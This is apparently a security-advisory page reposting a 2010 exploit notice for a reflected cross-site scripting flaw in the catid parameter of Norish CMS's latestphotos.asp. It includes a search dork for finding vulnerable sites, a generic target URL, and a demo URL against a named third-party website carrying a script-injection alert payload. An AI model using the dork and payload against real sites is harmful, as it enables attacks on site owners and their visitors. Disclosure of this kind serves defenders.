Norish CMS (latestphotos.asp) Cross Site Scripting Vulnerability

2010-12-06 / 2010-12-07
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-79

################################################################# [+] Exploit Title: Norish CMS (latestphotos.asp) Cross Site Scripting Vulnerability [+] Author: Cair3x [+] Team : [ Ajax ] Security Team * [+] Dork : "Powered by Morish CMS" ###########################[ Exploit ]########################### Vulnerability Page : latestphotos.asp latestphotos.asp?catid=[Xss] http://target.com/[patch]/latestphotos.asp?catid=[Xss] Demo : http://www.breathtaking-photos.com/latestphotos.asp?catid=8"><script>alert('BY : Ajaxtm [Cair3x]')</script> ###########################[ Exploit ]########################### ################################################################# BY : Cair3x [Cair3x.Support@Gmail.com] Web Site : Ajaxtm.Com Forum : http://Ajaxtm.com/ [+] We Are : HUrr!c4nE , Cair3x #################################################################

References:

http://Ajaxtm.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top